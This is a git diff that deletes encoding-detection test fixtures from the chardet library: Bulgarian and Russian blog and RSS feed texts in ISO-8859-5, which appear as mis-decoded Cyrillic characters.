װ׀ ״׳״׳׀ג ג ױ װׂױ ױבג׀ ׀ גןג ״, גאןׁׂ׀ װ׀ ׂ״׀ׂ׀ ב גױײ״גױ וא׀״, ׃׀ג בך ׀ א׀ׁג׀, חױבג ן׀ ׂאױױ װ׀ ו׀ׂ׀ ״ בך אױװ״ ׀ ׀הױ ״ ׂװ׀ (׃א״ןג ״ אױ). -½ױװױןג׀ בױ ׀ב׀ו, דבןו װ׀ גבח׀ װ ױװ ׳׀ׂױװױ״ױ, ג װ׀ ב״ ׀ײ׀ ׳װא׀בג״ ב יױ װׂ׀׀ ײאׂז״ ״ גאןׁׂ׀טױ װ׀ בױ ךגדׂ׀ ׳׀ ֱה״ן. ֵׂ׀׀וױ ױװ״ ׀ׂגׁדב ׀ µג׀ (ׁ״ױג״גױ ׳׀ ׂאךי׀ױ ב״ ׃״ ד״וױ ׂװ׀׃׀ בױװ ב״׳׀ױג ״ ׂךׂ ²׀א׀, ׳׀יג ן׀טױ ׳׀ ׂאךי׀ױ ׀ בה״ב׀ג׀), ךגדׂ׀ױג ׀ ׳׀װ׀ג׀ בױװ׀׀ ױ ױ הױאג׀, א׀װ״ ן׀ׂ״ א״ח״׀ ״׀ג״׀ ױ א׀ׁגױטױ ױאױךב׀ג ״ ׁױטױ גױײ״ח. °׳ בױ בוׂ׀׀ו ג ױדװׁ״גױ בױװ׀״, ׀ ה״״גױ ױ ײ׀וױ ׃ װ׀ ׃״ א׀׳ׁױאױ, ׁןו׀ ׀׀״״ ׳ׂד׀, ׀ בדׁג״גא״גױ ױ ײױוױ װ׀ ׃״ הדב״א׀ױ. ²״װןוױ, חױ ״׀ ׀ױא׀, גאױװ ׀ ׀ׂגׁדב׀, ׃ װׁא׀ ״װױן, ׁױטױ דב׀ג׀ ב׀ ׳׀ 2 ״דג״, ג װ׀ ״ װא׀׳״. -¸׳ױ׀װ׀ו בױ ג בגדװ׀ ׂ ֱה״ן, וׂ׀׀ו ׀אטאדג׀ ״ װ״בױןג׀ א״מח״. -¸׳ׂװ״: -¼א׀׳ן װ׀ ךגדׂ׀ ׂױחױ ג װׂ׀ ח׀ב׀ ב ׀ׂגׁדב. -½ױ ב״ ׳׀בדײ׀ׂ׀ װ׀ בױ ךגדׂ׀ גׂ׀ ׃ ׳׀ ױװ״-װׂ׀ װ״ אױבג. -²״װןו אױג, ב׀ גׂ׀, װאד׃ ךג גאןׁׂ׀ ױ װ׀ ׃ ״׀. -ְ׀׳זׂױגג בׂױגױ״ױ ׂ ¼אב׀ג׀ ׃א׀װ״׀ ״ ו׀אױב׀ ׃, בׁױ ״׀ׂג. -²׀אױב״גױ ג׀ב״ג׀ ב׀ -בך״ ג בה״ב״גױ. -40 ״ג׀ ב׀ ׃ ׳׀ ךג װ ²׀א׀, אױ׀ױ ׃ ב׀, וױ בױ ׃ךאח״ט, וױ ב״ ׀י׀ט. -³ױט׀ אװךײ׀ׂ׀ װ׀ ױ ױבױא״׳ױ ׂ ן״ גטױ״ן. -° אװךײ׀ׂ׀ ג׀׀, יױ גאןׁׂ׀ װ׀ ׃ױן ״װױןג׀ ׳׀ אדׁא״׀ ³אױ-װד. - http://ecloga.cult.bg/log/index.php?p=250 - - - ֲױײ ױ, ׀״בג״׀ ;) - ´ךאײױ״ ׃אױי ׀הױ ״ ׃אױי ױ100 (מׁ״ױױ ׂבױ ׀), יױ ױא׀׳ױח׀ג׀, ׂגדא׀ בך בױ װ׀ ב״ א׀ׂן ׁ׀״״גױ, װױב ױ׃״גױ ׀׃׀ו׀ ׂ ױח׀ג״ז׀ג׀ ׳׀ װ׀ ״׳ױ׳ױ, ׀ ׀׳ ׀ ױװ ב״ב׀״ױ װ׀ בױ אױױבג״ ׳׀װ ׃ךאׁ׀ ״ ״ װ׀ ״ ׂװ״׃׀ג טד אױ׳ זן׀ג׀, בױװׂ׀י׀, בױװ״ז׀. ´׀ ױ בױ ׂךא׀ ׃ ״׳בג״ב׀ ג א׀׳״ז״גױ, חױ ג׀׳״ ׂױחױא ן׀ װ׀ ב׃׀ װ׀ ״ א׀ׂן ׂב״ח״גױ אׁױ״. ַדװן בױ ׳׀י ׂב״ח״ ב״ ״בןג, חױ ב״בגױױ ׀װ״״בגא׀גא ׳׀ח׀ׂ׀ ג ו׀׀״ װ גױױהױ גױו״, ן׃׀ ױ גױײ װ׀ ׀׃׀ט ׀ ׂב״ח״, בׁױ ׃׀ג גױ ״׳בג׀ׂןג ׂ ׁ׀״״, ׀ׂ װ׀ בױ א׀ׂ״. ÷׀ג ׳׀ ׀׀ ב׀ ״ ד״״ אױײׂ ׀ׁױ, ױ ױ א״׀ג, ׀ ה״׀ב״בג׀ג׀ ױ ׂ גדב, ׀א׀ׂ דײ׀ב, ׀ דײ ״ ׁןו׀ ׀״ב׀״ ׀ ״בגחױ (ׂױחױ יױ בױ א׀׳׀ח׀ ג דײ׀ב). ¿ײױ׀גױ ״ 3 דבױט״ ח״ׂ״ װ״ ״ זן׀ בױװׂ׀י׀ בױװ״ז׀ װ׀ אױט׀ אׁױ״גױ, ׀ גױ ױ ב׀ ׀. ַדװן בױ ׃׀ ״ ׀-׀א׀ן יױ ״ בג׀ױ ׂאױױ װ׀ בױ גװ׀ ׀ װױ׀, ב״ׂ ׀ ױא׀ז״׀ג׀ ב״בגױ׀, ןג יױ ״׳׳ׂ׀ ׳׀׀אױװ, ׀אױװ ב ״׃ׂ״ב׀ג׀. ·ׂדח׀ג זױאג״ ׀ ÷א׀הגׂױא ״ גׂ׀ ׀ ױ ׁװאןׂ׀. -¿אױװ׀׃׀, חױ ן׀ װ׀ ׁ׃ׂ׀ גױ׳״ װ״, ׳׀גׂ׀ ׃׀ װ׀ חױבג״גן ׀ ׂב״ח״, ״ג דגאױ ״׀ג א׀׳״. - http://ecloga.cult.bg/log/index.php?p=249 - - - ³ױא׃לׂװױב, ױװ ג׀ׂ׀ - ´ױב גאןׁׂ׀טױ װ׀ ׁךװױ װבג׀ ׀ױחױ װױ, ׀ ״ בױ א׀׳״׀, בױװ 16 ײױ ״ װ׀ בג׀ױ ׀ױחױ. -÷ד״ו ב״ ןױ ״ בױ בךײ׀״ו, חױ ױ בך ׂ׳ױ ׂױחױ ׀א״, ו׀אױב׀ו ב״ א׀״ז׀, ׀ ״ גאןׁׂ׀ו׀ ״ ׳׀ ׁ״ױג װ ²׀א׀. ְ׀״ז׀ גאןׁׂ׀ װ׀ ב״ דן, ״׀חױ ן׀ װ׀ ״׀ ב ׀ׂ װ׀ ךגדׂ׀, ׀ בך ׁױי׀ װ׀ בך ׂךׂ ²׀א׀. ¾ׁױי׀ בך ג גא״ ׃װ״״ װ׀ ג״װ׀ ״ ׀-בױגױ בױ ׀׀״ו, װ׀ ״י ױ ״ אױח״ װ׀ בג״׃׀ דגאױ ׂ אב׀ג׀ בג״ז׀, װ׀ װ׀ דבױן װ׀ בױ ׂ״װן ״ ב ׂױחױ וא׀, חױ ׳׀ױ ׃׀ ׀ יױ ׃׀, ױ׀ ױ ׃ׂאן אױװׂ׀א״גױ, ׂבױ יױ בך ׂ ֱה״ן ״ ױ ח׀׀ א׀ׁג׀. ÷א׀ײׁ׀ג׀ ׀ א׀״ז׀ג׀ ״ ״׀׀ג׀ בױװ״ז׀ ב״ בױ ׀׳׀ גױײ״חך דװ׀א ׂךאוד ׀ׂױגױ ״, װױב ב״ א״ח׀, ׀ יױ ב״ א״ח״ ״ -׀ג׀, יױ ױ בך ב״ ד״ ׳׀וא׀ׂ׀ױ א׀װ״ ״ב׀ ׀ ׀א״, ג ױ -׀אױװ ״ ׂ א׀׀ בױג׀ א׀׳וװ״גױ בױ דׂױ״ח״ו׀, ׁױװ׀ ״ ױא׀׀ בגא׀׀ בױ, ײ״ׂױױ ײ״ׂג ׀׳׀ױ. - http://ecloga.cult.bg/log/index.php?p=248 - - - ֳה-דה - ֲױ׳״ װ״ ב׀ ׀א׀ׂ ט׀א״ ׳׀ ױ, ׀װב״ בך ׀גׂ׀אױ ״ בױ ׀װןׂ׀ װ׀ ב״ ח״׀ ׀ ׂ א׀ן ׀ בױװ״ז׀ג׀, בױװׂ׀י׀ג׀ אװךײ׀ׂ׀. ½׀א׀ׂ בױ חדװן װ׀״ "¼ןג ײ״ׂג באױװ ״װ״׀ז״גױ" ױ ױ װוװןי ׳׀׃׀ׂ״ױ ׳׀ ג׳״ ׁ׃ ;) - http://ecloga.cult.bg/log/index.php?p=247 - - - ¿א׀׳״ז״ - ¿א׀׳״ז״גױ ױ ׂ״׀׃״ ב׀ ׀ח״ ׳׀ ח״ׂ׀, בױױ״גױ בׁױ. ֱ׀ג ׂבאױבױ״ױ, ״׳׀א׀וױ חדװױב, ׂךאױ״ חױ ׀װ׀ו ׀ ױגױ ֱׁ״ױב״ ג 1 ״גךא ״ בדגא״ג׀ ׁױטױ בגא׀ט, ׂ״׀׃״ גאןׁׂ׀ װ׀ בױ ׃ױװ׀ג ױג״ױג״גױ, ׂדבךג ׁױטױ ׀ ױי באױװ ױײװד ֲךא׃ׂ״יױ ״ ִ״אג. -½׀-ױא״ןגג ב׀ בױױ״גױ ׁױװ״, ױא״ןגג ױ, חױ ׁ׀ׁ״גױ ״ װןװׂז״גױ ״ב׀ג װ׀ ׁןװׂ׀ג 12-13 ״ װ׀ בןג בױװׁױװױ בך, ׀ ׀׳ ׂ ג׀״ׂ׀ ױג״ ב״ ן׃׀ 5-6 ״ ״ ״װׂ׀ ׀׀׃א װ׀ בג׀׀ ׳׀ ׁןװ. ½ױװב״ׂ׀ױג ױ דײ׀ב, ׀ ׂב״חג ג׃אױ, ׂחױא׀ ״׀טױ אׁױ ב ױװ״ בד״גח ׀ א״ׂ׀ ״ בױװ ׀ג װװױ גױו״, בךבױװ״גױ ״ג ״׀ג מח ג א״ׂ׀ בױ ׀א׀ׂ״ו׀ ׀ דװ״, ״׀ גךא׀״ן ב גױו״גױ בׂױׂ״ אןׂ״ ׳׀ ׂב״ח ״ בך ׃״ גױׁ׀, בךגׂױג גױ, ױ, ׀ גאןׁׂ׀ װ׀ ׃״ ב׀ט׀ ׀. ÷׀ג ״ װ׀ ױ, אױטױ״ױג ׁױטױ װ׀ בױ ׂ׳ױױ מח ״ װױב, בדגא״ג׀ װ׀ װװ׀ג ״ װ׀ דב׀ג ׀ׁױ״ אױ׳ װאד׃ דבגאבגׂ. ¼חױג׀ג׀ ב״ בׂךאט״ו׀ א׀ׁג׀ג׀ ׃ װׁאױ, ױׂ׀׀ ׀ ¼ױ׃׀׀, װבױ׃׀ ב׀ ׁ״״ ׃ גח״, ׀ג ״׳מח״ ׀ באבג״גױ, אױװ׀׃׀, חױ ׀ ״׀ ׂאױױ װ׀ ׃״ גױבגׂ׀ -ׁט״א ״ ״ בױ ׁ׀װן, יױ בױ א׀ׂןג ״ ב גׂ׀, ׳׀בױ׃׀ ױ דבגאׂ׀ג. ֱױ׃׀ מא׀ װ׀ ״ בױ בױןג מח׀״גױ ׀ א׀ׁג׀ ״ װ׀ ן׀ ׂױחױ א׀ײׁ״ (״באױ בױ ׀װןׂ׀). -ֱא ב״ ׃ׂא״ו ב א׀׳״ח״ וא׀, חױ ׂ״ג׀ױ ױװ׀ בׁױ׀ ׀׃אױב״ן ״ ׳ׁ׀ ׂךׂ ׂך׳װדו׀, וא׀ג׀ ב׀ ׁױװ״, דאױ״ ״ ׳ׁױ״, דא׀ׂןׂ׀י״גױ ב׀ אױ׀ױ ׀ח״ ״ ױ ״בןג, חױ ׀ גדב׀ג ׀ ׂױחױ ׀ וא׀ג׀ יױ ״׀ ׳׀ ׂב״ח״. ² ֱ°ֹ בױ דא׀ׂןׂ׀ג ױב, ׳׀יג ב׀ װױׁױ״ ״ װׂ״, ״׀ ׳׀ ׂב״ח״, ׀ ׀-ױב בױ ׀״ד״א׀ װׂױ ׀אװ, ׀ ג ױ ״ב׀ גׂ׀ ׃, חױ װ׀ ױ ױבג״ײ״. ¿אױװחדבגׂ׀ױ, חױ בא יױ ״׀ װבג׀ ד״ח״ ״׳בגךױ״ן ״ ײױ ׁ״ ׃א׀ײװ׀ב״ בׁךבךז״, ׃אױ-װד בױ בדחׂ׀ג אױ׳ 8 ׃װ״״. ¿אבג בױ דבױי׀ ׂךׂ ׂך׳װדו׀. - http://ecloga.cult.bg/log/index.php?p=246 - - - µװ״ דײ׀בױ װױ - ´ױב אװךײ״ו ׁאׁ׀ג׀ ב ױבדט״גױ מגא״ ׂ ה״ב׀ ״ ױײױ זן װױ ױ בך ב״ ׂ בג׀״ח׀ג׀ בױ בדח״ ױװ ׃ן ױי׀בג״ױ. ½ן בױ ױ ׀ך׀ ״ ״ ױ גא׀װ׀ א׀״ז׀ג׀ ב ןױג, גױהגױא״גױ, ט׀׀ג׀, מחׂױגױ, ׳׀אןװג ׳׀ גױױה׀, װ״בׂױ (ן״ ױ ׃׀ װ׀ ב״ ׃״ ׀ׁ׀ׂן ױב), ױג גׂױאג״ ״ ׳׀ ״ ״ ׀׳ ׀ׂ יױ. ½ױ. ֲׂ׀ ױ ט׀א אבג. ֲד דײ ױ בױ א׀װױ, ױ בױ א׀װױ, ׀׀ בױ א׀װױ. ¿װ׳״א׀, חױ ױ װױ ׀ ן דא״ױא ״״ ״ױג ׀ ±״׀ ״״ °ֲ״²״ ¿׀אגױא. ¼׀׀ ד, װ׀ ׃ בױגןג בךי״גױ ך״, ״ג ״ א״ח״ןׂ׀. - - http://ecloga.cult.bg/log/index.php?p=245 - - - ֲ׀׀ ױ ג - ÷׀׳׀ו, חױ װױב ױ ױ בׂךאג׀ ״ א׀׳״ וא׀ בױ ׂ״אדב״ו׀, ג׀ בױן ׀ג״ׂ״אדב״גױ, ½אגך װ׀ ׃ װדו׀ג. ¾א׀ׂ״ו ׀ג׀ ׀ ׃׀ׂ״ן אױװ׀גא ״ יױ בױ ג׀ ב ״ױגב״גױ ׂױ, ׀װןׂ׀ בױ ױ ׂױחױאג׀ װ׀ ױ בׂךאט״ בדח, ׂױחױ ״ בױ יױ װ׀ דװ׀אן 1-2 ׃ױ״ ״ װ׀ בױ גדב׀. - http://ecloga.cult.bg/log/index.php?p=244 - - - ֱׁךא׀״ ״בגא״״ - ֱי״, בױװ א׀ׁג׀ בױ ׀ך׀ו ׂ ¼׀חד ״חד װ׀ אׁׂ׀ ׀ ױ ׀ג״׀ױא״׀ב׀ג׀ דון. ¾אױװױױ ״ ו׀אױב׀, ׁױטױ ׀װב״ טד ״ ׃׀ׂ׀ג׀ ״ ךגױטױ. ½׀ ׀ב׀ג׀ בױ ׀בג׀״ו׀ ױװ״ אךׁ ״ ױװ׀ װבג׀ א״ןג׀ ײױ׀, בױװ ״׳ׂױבג ׂאױױ אךׁךג בױ ׂךא׀ ב װאד׃׀ װבג׀ א״ןג׀ ײױ׀ ״ ׂױחױ בךׂבױ ױ דחדװ״. ² ׃׀ׂ׀ג׀ ״ בױ ׳׀׃ױ׳װ״ ״בךג׀, חױ ׂװט׀ג׀ ײױ׀ ״ ױ ׃ ׳׀ג׀, ױ ײױו װ׀ בױ בױגן גךװױ. ÷׀ג ״ װ׀ ױ, ײױ װ׀ ױ א״״ח׀׀ ״׳א׀ײױ״ױ, ײױבגׂױ ״ ׂב״ח ׀ ןן ׳׀ג׀. -ֲ׀׳״ בדגא״ ׀ אױב׀ו, ג׀ג בך ׀ א׀ׁג׀ ױ ױ בׂךאג׀ ׀ ױװ ןבג, ׀ׁ״״ו א׀׳״ גאױׁ״גױ״ ״ בׂךאט״ו גׂ׀-ׂ׀, יױ ױ ׃׀ װ׀ בױ אג׀ ״ ב״׃דא יױ ב״ ׀ױאן יױ א׀ׁג׀, ױ חױ ב״ ן׀, ױ ״ בױ ׳׀״׀ׂ׀ ב דױׁ ״גױאהױב״גױ ׀ ױ׀, ג ב״ ׀א׀ׂ״ו ׀ ׀ט״׀ג׀. ²בךיבג ״׀ װ׀ א׀ׂן ״ בג׀אך בא״גׂױ, ״׳׃ױײװ׀ יױ בױ א׀׳ג׀׀ׂ׀ װבג׀ ׂאױױ ״ יױ ח׀׀ ¼״ױ, ג בױ׀ ױי ׳׀ חױאױױ װױב, ׂװ׀ ״ בױ ״ׂ׀ ׀ ױ, ׀ בױ בױי׀, חױ ח׀ׂ׀ װ׀ א״בג״׃ױ ױװ׀ ׂ בא ׂאױױ. ¸׳׃ױײװ׀, חױ ױגך יױ ױ ׂ חױגׂךאגך, ׁ׳ױ ױ ױ ן׀ׂ בגא׀ א׀׳״ח ׀בגאױ״ױ, ״ ױ ב׀ ױ, גג׀גך ״׀ יױ ׂױבױ״ ױ׃״. ֿׂ װױב ױ װױ ׳׀ װׁא ׀בגאױ״ױ. - http://ecloga.cult.bg/log/index.php?p=243 - - - ¼׀׀ ״ ׀ ״גױ - ֱי״ אױט״ו װ׀ בױ ׁאן ׀ װׂ׀ האג׀, א׀ׂןו ׀ ׀ ה״ב ױ״װײךא׀, ג׀ ׀ג בך ג׀ בױ ׳׀ױו ב ױװ״ בג׀א אׁױ, ׳ׂדׂ׀ג׀ ׀אג׀ ׀ ױװ״ ױ׃׀. ¿אױװ״ ׁןו ׁדדג׀ ÷״ב ׳׀ װ׀ ׂ״װן ב ׀ׂ ײ״ׂג ב״ ״׀ א׀ׁג׀, ׀׳׀ בױ ׀דװ״ װױ 97 ׀ ״גױב״ ח״בױג, א׀׳א׀ׁגױ ג °ׂ׀ב װײ״. ֲׂ׀ װׁאױ, ¿א׳אז״ 98 ן׀ג װװאךײ׀ ׳׀ ג׀ׂ׀ ױי, ׂךאױ״, חױ ױ ׀װב״ א׀׳אבגא׀ױ, גׂ׀ ױי ן׀ װװאךײ׀ ג ׀ױ״גױ. ¿אױבדט׀ו בגא׀״ז׀ג׀ ׀ ¸גױ, ג׀ ב׀ װױג ױ ״ ׀׳׀ו׀ באױװױ אךבג. ¿אױאׂ״ו ״ ׃ד׃ך׀, ׂױחױג ״הא׀ז״ן בױ ׳׀מח׀ׂ׀טױ ׂ ׀״א׀ױ ׀ א״׳ׂװ״גױן ׀ װך׀ג׀ ׀ג׀, גג׀ ׂױחױ גאןׁׂ׀ װ׀ ״׀ װװאךײ׀, ׀׳ ױײױ בך ךא׳ױ״ׂ ױױ בױ ׂך׳װךאײ׀ו ג גׂ׀אןױ ׀ דג״ןג׀. ¿א״ׁן׃׀ו װ ײױא׀ "ׁ׀װ״ בױ ׀ א״ןגױ", א״ןגױ״גױ... ׀-ׂ׀ײג ױי ׀ בׂױג׀ ב׀, ׂןאׂ׀ ׂ גׂ׀. ֲא׀בהױא״א׀וױ 40 ױ׃׀ׁ׀ג׀ בךב באבג 5÷ׁ ׂ בױדװ׀ ג ²׀א׀ װ ֱה״ן (±ֲ÷ װ׀ ׃ װײׂ׀׀ג, אךב״ ״׳ױא״ז״, 8÷ׁ ךדװ ב °´ֱ», ״׀ג װ׀ װ׀װ׀ג, ׃ױװ׀ג װ׀ ױחױןג ׀ ׃ךאׁ׀ ׀ ״׳בגא׀װ׀״ן גאױׁ״גױ ׀ ׃א׳״גױ ״ ױװ׀גױ״ דבד׃״). ֱױ׃׀ ױ ב״ ״׀ ׂבן׀ׂ״ ״גױב״ װא׀ׂױא״ ׂ ׀או״ׂ ׀ דױׁבךאׂךא׀. -ֲד-י דח״ו ״ ׁ׀ײװ׀ױ ג װׂ״ן גאױׁ״גױ. ²׀ײג ױ ׂב״ח״ װ׀ בױ װׂ״. - http://ecloga.cult.bg/log/index.php?p=242 - -
    -
    diff --git a/chardet/tests/iso-8859-5-bulgarian/ide.li.xml b/chardet/tests/iso-8859-5-bulgarian/ide.li.xml deleted file mode 100644 index 17cb59d..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/ide.li.xml +++ /dev/null @@ -1,54 +0,0 @@ - - - - - - -¸װױ.״? -http://ide.li/ -¸װױ.״? - ׳׀ ׁך׃׀א״גױ בׂױג׀ -bg_BG - - -½ױױ׃׀ױ ׂב ׀ ״ג׀ב״ ׀״ ״ ײׂױ ג ±ך׃׀א״ן ׂ ֲדאז״ן -http://ide.li/article1050.html -·׀ב״ױ׀ג׀ ׂ בױװ ׂאױױ דגאױׁ׀ ׀ ׀״ ״ ײׂױ ג דחױ״ז״ ״ ׀װ״ וא׀ ״ ׂבױ -חױבגג ״ ״׳׳ׂ׀ױ ״ א״ בׂ׀װ״ ״ ׳׀ ׀א׀ןׂ׀״ן א׀ײװ׀ג בױא״׳״ גאױׂ׃״ ׂ ֲדאז״ן. - - - -ֱגױה׀ ´׀׀״ׂ ׀ גׂ-ױא׀׀ ׂ ¸ג׀״ן -http://ide.li/article1049.html -±ך׃׀אב״ןג ״״בגךא ׀ דגדא׀ג׀ ױ ׀ ױא׀״גױ ׀ ״ג׀״׀ב׀ג׀ גױױׂ״׳״ן, ןג דב׀ בױא״׀ ב ױ׃ׂ דח׀בג״ױ. - - - -² ֱ°ֹ: ֱךװןג ׀ט ׃״׀בג״ ׳׀ ״׳׀ב״ׂ׀ױ ׀ 13-׃װ״ט׀ -http://ide.li/article1048.html -39-׃װ״ט״ןג ׁך׃׀א״ ױ ׁ״ ׀אױבגדׂ׀ אױװ״ חױג״א״ װ״ ׂ ¸בג ְחױבגךא; ג ױ דׂ׀ײ׀ׂ׀ גאױלא ׂ ׃א׀װ׀, דגחןׂ׀ג ױבג״ ױװ״״. - - - -¶״ׂגךג א׀ ¼ךאגׂ ¼אױ -http://ide.li/article1047.html -½׀ ״דג״ ךג ג ד״גױ ׀ ׂ״ב״גױ ב׃א׀װ״ ׀ ֲױ °ׂ״ׂ, ׃א׳װׂױגױ ׀גױ״ ׀ גױױ״גױ, ׃ךח׀ׂ׀ג׀ ׀ ט׀אױ״גױ ד״ז״, ׃אױ-װד װׁאױ ׳׀ג׀ג׀ ז״ׂ״״׳׀ז״ן בךב ׳׀טױױגןׂ׀י ױ׳ג״ח ״זױ ״ דב׀ ׀ בײ אױױגױ״גױ ׀׃״בגא׀״ ױ׳׀ײ׀ אן׳ בױ אױן, ׀ׂ״׳׀״ ׂ א׀׀ ׀ ¼ךאגׂ ¼אױ. - - - -ֱךװױׁ װױ באױיד ½¾¸ -http://ide.li/article1046.html -² ׀ח׀ג ׀ װױױׂא״ 2005, דח׀בג״ז״גױ ׂ °ז״ןג׀ אג״ׂ ׳׀װךײ״גױג ׳װא׀ׂ ב״׃דאןׂ׀ױ ׃א׀ײװ׀בגׂ ׃׀בדׂ׀ו׀ ׀װ׀ג ׀ ֱ±ֱ ±ךװױיױ װ׀ ׃״ אױװבג׀ׂןׂ׀ אױװ ׁך׃׀אב״גױ ׂ׀בג״ ״ װ׀ ׳׀ׂױװױ ג גןו ״ױ בךװױׁ װױ באױיד װךאײ׀ׂ׀ג׀ ׳׀ װ״בא״״׀ז״ן ׀ ׁ׀׳׀ ׃א׀ײװ׀בגׂ, ױא׀ׂױא ״׳׳ׂ׀ױ ׀ ״ח״ װ׀״ ג ½·¾÷ ״ דח׀בגךׂ״ ױ׀א״, ׀ג ״ ׳׀ ׁ״װ״ ״ ױׂױג״ גא׀ׂױ״ ג אױװבג׀ׂ״גױ״ ׀ ׁך׃׀אב׀ג׀ װךאײ׀ׂ׀ ך ׁך׃׀א״גױ ײ״ׂױױי״ ׂ חדײׁ״׀. - - - -¾גא״ג׀ ׂ׃װ״ט׀ ׀אג״ח׀ -http://ide.li/article1045.html -´ ׁך׃׀אב״גױ װױדג׀ג״ ״ ״ג״ז״ ג דא׀ׂןׂ׀י״גױ ׀אג״״ ״ ג ׳״ז״ןג׀. - - - -ֱױטג, גא׀׃״״חג ״ גאׂױ ״װ״גבג, ״״ ÷דא״׳״ 2005 -http://ide.li/article1044.html -² ׀ׂױחױא״ױג ׀ ½ׂ׀ ׃װ״׀ ׀׃ױז״ן "ִא׀ב אױב" דׁ״דׂ׀ גא׀װ״ז״״ן ב״ ב״בך ב דא״׳״ \ No newline at end of file diff --git a/chardet/tests/iso-8859-5-bulgarian/linux-bg.org.xml b/chardet/tests/iso-8859-5-bulgarian/linux-bg.org.xml deleted file mode 100644 index 92df00e..0000000 --- a/chardet/tests/iso-8859-5-bulgarian/linux-bg.org.xml +++ /dev/null @@ -1,95 +0,0 @@ - - - - - - - »״דב ׳׀ ׁך׃׀א״: ½ׂ״״ - http://www.linux-bg.org - Welcome to Linux-bg : Everything you need for Linux in Bulgarian! - Your guide from the beginning till the end. - - bg - (PICS-1.1 "http://www.classify.org/safesurf/" 1 r (SS~~000 1)) - Copyright 1999-2004, Slavei Karadjov - slaff@linux-bg.org - support@linux-bg.org - - - - - www.linux-bg.org - http://www.linux-bg.org/ads/linux-bg4.gif - http://www.linux-bg.org - 88 - 31 - »״דב ׳׀ ׁך׃׀א״ - - - -ַױבג״ג ׂ ןװא - 2.6.15 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378765283 - - -ֱׁׂװ״ןג בהגדױא ׀ג בז״׀ װׂ״ײױ״ױ -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378676431 - - -־ׁ״ױ׀ ׂױאב״ן ׀ GIMP -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378652973 - - -¿אױװ׀ ױבזױב״ן ׀ RIAA -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378602737 - - -NetBSD 3.0 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378503192 - - -¸׳ױ׳ױ OpenOffice.org 2.0.1 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378422321 - - -ֳױׁ ֲױו יױ בױ אׂױװױ אױ׳ ןגג -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378392594 - - -X11R7 & X11R6.9 ב׀ ׂױחױ ׀ ׁן בׂןג -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378403131 - - -·״׀ ״׳ױ׀װ׀ ׂ SUSE Linux 10 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378384750 - - -Qt 4.1 -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378383905 - - -¿אױגךג Seti@HOME ב״א׀ װ׀ בךיױבגׂדׂ׀ -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378357534 - - -´ױױ׃״א׀ױ ׀ access ״ג״״ ׂ Postfix -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378356724 - - -IBM װ׀א״ GPFS -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378332641 - - -ֱך בׁׂײװ׀ׂ׀ BrandZ בהגדױא׀ -http://linux-bg.org/cgi-bin/y/index.pl?page=news&key=378326293 - - - - - 1 - - - - diff --git a/chardet/tests/iso-8859-5-cyrillic/aif.ru.health.xml b/chardet/tests/iso-8859-5-cyrillic/aif.ru.health.xml deleted file mode 100644 index af54692..0000000 --- a/chardet/tests/iso-8859-5-cyrillic/aif.ru.health.xml +++ /dev/null @@ -1,131 +0,0 @@ - - - - - - www.AIF.ru - ¸גױאױג-ׂױאב״ן ״׳װ׀״ן "°״ִ ·װאׂלױ" - http://www.aif.ru/online/health - - - °״ִ ·װאׂלױ - http://www.aif.ru/data/mags/health/button.gif - http://www.aif.ru/online/health - 88 - 31 - - - - ÷׀ ױאױײ״גל ׂ׃װממ חל - http://www.aif.ru/online/health/592/11_01 - - ½׀ׂױאױ, ױװ״בגׂױױ, ׂ חג בױ׃װן ײ ׂױא״גל ׁױ׳׃ׂאח, ג׀ םג ׂ ג, חג ½ׂכ ׃װ ׁן׳׀גױל ׀בגד״ג. ½ױבגאן ״ ׀ חג! ֽג ױ אבג חױאױװ א׀׳װ״, םג - ׂױו׀! ° ׂױו״ ׂ ײ״׳״ א״ןג גױח׀גל. ¾גױח׀גל ט״א ״ װױל׀ םװ׀ װׂ׀-גא״... ¸ ׂױבג אׂ׳׃׀ט׀ױכו "ׂ׃ בח׀בגלן" ״ "ׂ׃ ׳װאׂלן" א׀׳װׂ׀״ױ ½ׂ׃ ׃װ׀ א״ב״ג ״ׁ ׂכױ ׁןח״, ״ׁ ׁבגאןױג בג׀אכױ. ´׀ׁכ בג׀א׀גלבן ״׳ׁױײ׀גל װׁ׃ ה״׀׀ מׁ״׃ א׀׳װ״׀, א״ׂױװד ױבל "א׀׳װ״חכו" א׀ׂ״ ׳׀בגל ׁױ׳׀בבג״. - - - ¸װ״גױ ׂ ׁ׀מ! - http://www.aif.ru/online/health/592/03_01 - - ֽג ײ װױ׀גל ׂ ״׀ו, ׂ ױטױ ב ׁױאױ׳ׂכ״ ״בגלן״ ״״ בױ. ¿׀א״גלבן ײ, װ׀ײױ ׳׀אכׂט״בל ׂ ױב. ÷׀ א׀ׂ״ל וװ״גל ׂ ׁ׀מ, ׀ א׀בב׀׳כׂ׀ױג ׂא׀ח-ה״׳״גױא׀ױׂג גװױױ״ן ׁ׀לױ׃״״ ױװ״ז״ב׃ זױגא׀ "³דג׀-÷״״" ־״ן °ְֲ°¼¾½¾²°. - - - ¾ חױ א׀בב׀ײױג אױ׀ז״ן ׀גד - http://www.aif.ru/online/health/592/05_01 - - ְױ׀ז״ן ¼׀גד - םג גדׁױאד״ׂ׀ן אׁ׀. ´ן ׀ זױ״ ׀ ״׳׀ח׀ל אױװ׀׳׀ח׀׀בל? "ְױ׀ז״ן ¼׀גד - םג גׂױג ױגח׃ ״ד״גױג׀ ׀ ׃״ױאחדׂבגׂ״גױלבג״ ׳׀ױװױ׃ ג״׀ ׀ בױב״ׁ״״׳׀ז״מ א׃׀״׳׀ ״ׁ׀גױא״ן״ גדׁױאדױ׳׀. ¿אױװ׀׳׀חױ׀ ׀ װן ׂכןׂױ״ן ׂ א׃׀״׳ױ ׂ׳ׁדװ״גױן גדׁױאדױ׳׀". (÷״גױג ױגחד ״ד״גױגד ״ דבגח״ׂבג״ ״הױז״״, ²¾·, 1965, 1970 